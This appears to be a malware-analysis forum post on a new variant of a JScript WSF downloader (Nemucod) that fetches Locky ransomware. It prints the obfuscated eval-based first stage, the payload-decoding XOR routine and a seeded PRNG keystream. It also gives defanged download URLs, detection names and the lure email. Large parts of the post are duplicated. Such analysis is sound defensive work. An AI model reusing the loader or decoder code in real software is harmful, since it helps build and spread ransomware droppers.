I received another fresh sample yesterday (July 28):
I assume it is a new version of the one I analysed in a previous post: the main structure is the same once the various obfuscation layers are stripped.
I will only write about main changes I saw
For full details of the previous version (the deobfuscated PDF attached there will help to follow the quick analysis below):
https://malwaretips.com/threads/new...y-mail-js-trojandownloader-nemucod-ajp.61375/
Name :
"annual report ~841~..wsf" (a Windows Script File with a doubled extension; WSF files are handled by the Windows Script Host, so opening the attachment runs the embedded JScript)
I reported it to hybrid-analysis :
This is the VxStream Sandbox Analysis Summary received by mail :
File Name: annual report ~841~..wsf
Analysis State: SUCCESS
Threat Verdict: malicious
Threat Score: 89/100
AV Detection Ratio: n/a
AV Family Name: n/a
Time of analysis: 2016-07-29 03:54:26
File Size (bytes): 56513
File Type: HTML document, ASCII text, with very long lines, with CRLF, LF line terminators
and the Hybrid Analysis report link (the VirusTotal link for the dropped payload is further down):
https://www.hybrid-analysis.com/sam...e5d743f18cd7c597ebd17dd3a56?environmentId=100
Quick analysis of changes :
Script language : JScript
The first stage is a string built from JScript `\xNN` hex escape sequences (mixed with a few literal characters), concatenated with `+`, passed through a no-op `split('').join('')`, and then handed to `eval()` in a second script block.
Example :
'\x76\x61\x72\x20KI\x7a\x20\x3d \x22\x65\x22\x20\x2b\x20\x22\x22\x3b\x0d\x0a'
=> `var KIz = "e" + "";` followed by CRLF (`\x0d\x0a` = carriage return + line feed, i.e. the next line of the decoded script)
<job>
<script language="JScript">
var aHq = ('\x76\x61\x72\x20KI\x7a\x20\x3d \x22\x65\x22\x20\x2b\x20\x22\x22\x3b\x0d\x0a'+
'\x76\x61r\x20\x51\x52\x770\x20\x3d \x22\x63l\x6fs\x22\x20+\x20\x22'+
'"\x3b\x0d\x0a\x76\x61\x72\x20\x45\x49\x71\x30\x20\x3d\x20\x22\x65\x22\x20\x2b '+
'\x22"\x3b\x0d\x0a\x76\x61\x72\x20T\x56e\x20=\x20\x22o\x46\x69\x6c\x22'+
'\x20\x2b\x20""\x3b\x0d\x0a\x76\x61r\x20D\x61\x20\x3d\x20\x22\x53\x61\x76'+
'\x65\x54" + \x22";\x0d\x0a\x76a\x72\x20\x57\x6a\x20\x3d\x20"'+
'\x78\x74"\x20\x2b\x20\x22"\x3b\x0d\n\x76a\x72\x20Ny\x20\x3d\x20\x22'+
'\x65\x54\x65\x22\x20+\x20"\x22\x3b\x0d\x0a\x76\x61\x72\x20\x57q4\x20\x3d'+
'\x20\x22\x77\x72\x69\x74"\x20\x2b
....
....
'\x4f\x680\x29\x5d\x28\x29\x3b\r\x0a\x7d\x3b').split('').join('');
var QZw1 = aHq;
</script>
<script language="JScript">
eval(QZw1);</script>
</job>
Once this stage is decoded (the second `<script>` block runs it with `eval(QZw1)`):
=> It looks like what I already described for the previous version.
The character-substitution cipher (two functions) and the deobfuscation function that rebuild the real EXE content are both still present.
Main change: the XOR step of the deobfuscation function (the part that "decrypts" the downloaded payload).
The
for (var index=0; index < file_content_temp.length; index++) {
is now performed first, and is also more complicated: the key no longer steps by a constant but is drawn from a PRNG:
var QVh1 = uheprng();
// New-version keystream: uheprng() is seeded with a constant inside the script
// (visible as mash(384267) in the uheprng listing below), so QVh1(256) yields a
// reproducible integer in 0..255 for every byte and the XOR can be replayed offline.
for (var index=0; index < file_content_temp.length; index++) {
file_content_temp[index] ^= QVh1(256); // XOR
}
with :
PAYLOAD :
=> classified as Locky.AP.gen on VirusTotal (8/53 engines at submission time)
https://www.virustotal.com/en/file/...be775a6eba4d1f9ba37e0c86dfaf81ead26/analysis/
%TEMP%\vGDwqGMe6.exe if the JS downloader deobfuscates it successfully (in the earlier analysis the dropped file was identified as a DOS executable even without the .exe extension);
otherwise the file is written without the .exe extension (see my analysis of the previous version for details).
URLs found by static analysis of the decoded script (defanged: `hxxp` and underscores inserted so they are not clickable, and the exact payload paths withheld):
hxxp://w_w_w_.pastificiodelduca.com/[name1]
hxxp://fiditra.de/[name2]
hxxp://darkhollowcoffee.com/[name3]
When I submitted this sample to VirusTotal I chose to share it publicly.
=> It can be downloaded for dynamic analysis by our authorised members only. Run it in an isolated, network-restricted VM: the script downloads and executes a Locky binary.
UPDATED :
KTS, ZAM, Crystal Security detected the downloader :
Trojan-Downloader.JS.Agent.lvk
Script:Generic/Saruth.A!Ieei
Trojan.Script.Heuristic-js.iacgm
JS/Dloader.DRY!tr.dldr
virus.js.gen.80
KTS, ZAM, Crystal Security & VoodooShield detected the payload :
Trojan:Win32/Goorka.A!Emaa
Win32.Trojan.WisdomEyes.151026.9950.9993
W32/Locky.AP.gen!Eldorado
Trojan/Win32.Locky.N2064104393
BScope.P2P-Worm.Palevo
QVM20.1.Malware.Gen
Lure e-mail body that carried the attachment (as received):
"Hi DardiM,
Speaking of the event, I attached the annual report that we discussed about
Best regards
Stacy Landry"
Speaking of the event, I attached the annual report that we discussed about
Best regards
Stacy Landry"
I assume it is a new version of the one I analysed in a previous post: the main structure is the same once the various obfuscation layers are stripped.
I will only describe the main changes I noticed.
For full details of the previous version (the deobfuscated PDF attached there will help to follow the quick analysis below):
https://malwaretips.com/threads/new...y-mail-js-trojandownloader-nemucod-ajp.61375/
Name :
"annual report ~841~..wsf" (a Windows Script File with a doubled extension; WSF files are handled by the Windows Script Host, so opening the attachment runs the embedded JScript)
I reported it to hybrid-analysis :
This is the VxStream Sandbox Analysis Summary received by mail :
File Name: annual report ~841~..wsf
Analysis State: SUCCESS
Threat Verdict: malicious
Threat Score: 89/100
AV Detection Ratio: n/a
AV Family Name: n/a
Time of analysis: 2016-07-29 03:54:26
File Size (bytes): 56513
File Type: HTML document, ASCII text, with very long lines, with CRLF, LF line terminators
and the Hybrid Analysis report link (the VirusTotal link for the dropped payload is further down):
https://www.hybrid-analysis.com/sam...e5d743f18cd7c597ebd17dd3a56?environmentId=100
Quick analysis of changes :
Script language : JScript
The first stage is a string built from JScript `\xNN` hex escape sequences (mixed with a few literal characters), concatenated with `+`, passed through a no-op `split('').join('')`, and then handed to `eval()` in a second script block.
Example :
'\x76\x61\x72\x20KI\x7a\x20\x3d \x22\x65\x22\x20\x2b\x20\x22\x22\x3b\x0d\x0a'
=> `var KIz = "e" + "";` followed by CRLF (`\x0d\x0a` = carriage return + line feed, i.e. the next line of the decoded script)
<job>
<script language="JScript">
var aHq = ('\x76\x61\x72\x20KI\x7a\x20\x3d \x22\x65\x22\x20\x2b\x20\x22\x22\x3b\x0d\x0a'+
'\x76\x61r\x20\x51\x52\x770\x20\x3d \x22\x63l\x6fs\x22\x20+\x20\x22'+
'"\x3b\x0d\x0a\x76\x61\x72\x20\x45\x49\x71\x30\x20\x3d\x20\x22\x65\x22\x20\x2b '+
'\x22"\x3b\x0d\x0a\x76\x61\x72\x20T\x56e\x20=\x20\x22o\x46\x69\x6c\x22'+
'\x20\x2b\x20""\x3b\x0d\x0a\x76\x61r\x20D\x61\x20\x3d\x20\x22\x53\x61\x76'+
'\x65\x54" + \x22";\x0d\x0a\x76a\x72\x20\x57\x6a\x20\x3d\x20"'+
'\x78\x74"\x20\x2b\x20\x22"\x3b\x0d\n\x76a\x72\x20Ny\x20\x3d\x20\x22'+
'\x65\x54\x65\x22\x20+\x20"\x22\x3b\x0d\x0a\x76\x61\x72\x20\x57q4\x20\x3d'+
'\x20\x22\x77\x72\x69\x74"\x20\x2b
....
....
'\x4f\x680\x29\x5d\x28\x29\x3b\r\x0a\x7d\x3b').split('').join('');
var QZw1 = aHq;
</script>
<script language="JScript">
eval(QZw1);</script>
</job>
Once this stage is decoded (the second `<script>` block runs it with `eval(QZw1)`):
=> It looks like what I already described for the previous version.
The character-substitution cipher (two functions) and the deobfuscation function that rebuild the real EXE content are both still present.
Main change: the XOR step of the deobfuscation function (the part that "decrypts" the downloaded payload). The listing below is the routine as seen in the previous version; the new sample changes the XOR loop as described after it.
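function deobfuscation(file_content_temp) {
    // Reassembled from the pasted listing (the paste duplicated the body and
    // swallowed the first statement into a comment line).
    // Input: array of byte values (0..255) of the downloaded blob; the last
    // four bytes are a little-endian checksum of the rest.
    // Returns the decoded bytes, or [] when the checksum does not match.
    // NOTE: the passed array is modified in place (splice / reverse / XOR).
    //
    // Steps, in order:
    //   1. bitwise OR / shifts -> read the 4-byte trailer as a 32-bit integer
    //   2. chars removed       -> drop the trailer
    //   3. modulo              -> additive checksum of the remaining bytes
    //   4. reverse             -> payload was stored back to front
    //   5. XOR                 -> rolling one-byte key 21, 26, 31, ... (mod 256)
    var number;

    // 1. Trailer, little-endian. `<< 24` yields a signed int32 while the
    //    checksum below stays non-negative, so the compare only works while
    //    the byte sum is below 2^31 -- true for any realistic payload size.
    var NJx3 = file_content_temp[file_content_temp.length - 4] |
        file_content_temp[file_content_temp.length - 3] << 8 |
        file_content_temp[file_content_temp.length - 2] << 16 |
        file_content_temp[file_content_temp.length - 1] << 24;

    // 2. remove 4 last chars from content
    file_content_temp.splice(file_content_temp.length - 4, 4);

    // 3. Checksum: sum of all bytes, seeded with 22, kept modulo 2^32.
    number = 22;
    for (var index = 0; index < file_content_temp.length; index++) {
        number = (number + file_content_temp[index]) % 0x100000000;
    }
    // Integrity gate: a corrupted or partial download yields an empty result.
    // Per the post, that is the case where the dropper writes the file without
    // an .exe extension instead of %TEMP%\vGDwqGMe6.exe.
    if (number != NJx3) { return []; };

    // 4./5. Reverse, then XOR with a key that starts at 21 and steps by 5.
    number = 21;
    file_content_temp = file_content_temp.reverse();
    for (var index = 0; index < file_content_temp.length; index++) {
        file_content_temp[index] ^= number; // XOR
        number = (number + 5) % 256;
    }
    return file_content_temp;
}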
for (var index=0; index < file_content_temp.length; index++) {
file_content_temp[index] ^= number; // XOR
number=(number + 5) % 256;
}number=(number + 5) % 256;
is now performed first, and is also more complicated: the key no longer steps by a constant but is drawn from a PRNG:
var QVh1 = uheprng();
// New-version keystream: uheprng() is seeded with a constant inside the script
// (visible as mash(384267) in the uheprng listing below), so QVh1(256) yields a
// reproducible integer in 0..255 for every byte and the XOR can be replayed offline.
for (var index=0; index < file_content_temp.length; index++) {
file_content_temp[index] ^= QVh1(256); // XOR
}
with :
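function uheprng() {
    // Reassembled from the pasted (duplicated and interleaved) listing.
    // This is the "Ultra-High Entropy PRNG" construction (Mash seeder +
    // multiply-with-carry generator) with one change that matters for
    // analysis: every state slot is seeded with the constant 384267 instead of
    // a random value, so the keystream is fully deterministic and the XOR
    // "encryption" of the payload can be replayed offline.
    // The paste shows `s = mash(384267)`; the `[i]` index was almost certainly
    // eaten as a forum italic tag -- with a bare `s` the generator returns NaN.
    // Returns random(range): an integer in [0, range).

    // Mash: string-hash seeder. Called with a value it folds that value into
    // the state n and returns a float in [0, 1); called with a falsy argument
    // it resets n.
    function Mash() {
        var n = 0xefc8249d;
        var mash = function(data) {
            if (data) {
                data = data.toString();
                for (var i = -8257 + 8257; i < data.length; i++) { // i.e. i = 0
                    n += data.charCodeAt(i);
                    var h = 0.02519603282416938 * n;
                    n = h >>> 0;
                    h -= n;
                    h *= n;
                    n = h >>> 0;
                    h -= n;
                    n += h * 0x100000000;
                }
                return (n >>> 0) * 2.3283064365386963e-10; // 2^-32
            } else n = 0xefc8249d;
        };
        return mash;
    }

    return (function() {
        var o = 48,           // state size
            c = 1,            // carry
            p = o,            // position in state
            s = new Array(o); // state
        var i, j;
        // Appears unused in the pasted fragments; kept as listed.
        var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
        var mash = Mash();
        for (i = 1 * 0; i < o; i++) s[i] = mash(384267); // constant seed, see header
        mash = null;
        // Combines two raw draws into a 53-bit fraction, scaled to [0, range).
        var random = function(range) {
            return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
        };
        // Multiply-with-carry step over the 48-slot state; returns [0, 1).
        function rawprng() {
            if (++p >= o) p = 0;
            var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
            return s[p] = t - (c = t | 0);
        }
        return random;
    }());
}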
PAYLOAD :
=> classified as Locky.AP.gen on VirusTotal (8/53 engines at submission time)
https://www.virustotal.com/en/file/...be775a6eba4d1f9ba37e0c86dfaf81ead26/analysis/
%TEMP%\vGDwqGMe6.exe if the JS downloader deobfuscates it successfully (in the earlier analysis the dropped file was identified as a DOS executable even without the .exe extension);
otherwise the file is written without the .exe extension (see my analysis of the previous version for details).
URLs found by static analysis of the decoded script (defanged: `hxxp` and underscores inserted so they are not clickable, and the exact payload paths withheld):
hxxp://w_w_w_.pastificiodelduca.com/[name1]
hxxp://fiditra.de/[name2]
hxxp://darkhollowcoffee.com/[name3]
When I submitted this sample to VirusTotal I chose to share it publicly.
=> It can be downloaded for dynamic analysis by our authorised members only. Run it in an isolated, network-restricted VM: the script downloads and executes a Locky binary.
UPDATED :
KTS, ZAM, Crystal Security detected the downloader :
Trojan-Downloader.JS.Agent.lvk
Script:Generic/Saruth.A!Ieei
Trojan.Script.Heuristic-js.iacgm
JS/Dloader.DRY!tr.dldr
virus.js.gen.80
KTS, ZAM, Crystal Security & VoodooShield detected the payload :
Trojan:Win32/Goorka.A!Emaa
Win32.Trojan.WisdomEyes.151026.9950.9993
W32/Locky.AP.gen!Eldorado
Trojan/Win32.Locky.N2064104393
BScope.P2P-Worm.Palevo
QVM20.1.Malware.Gen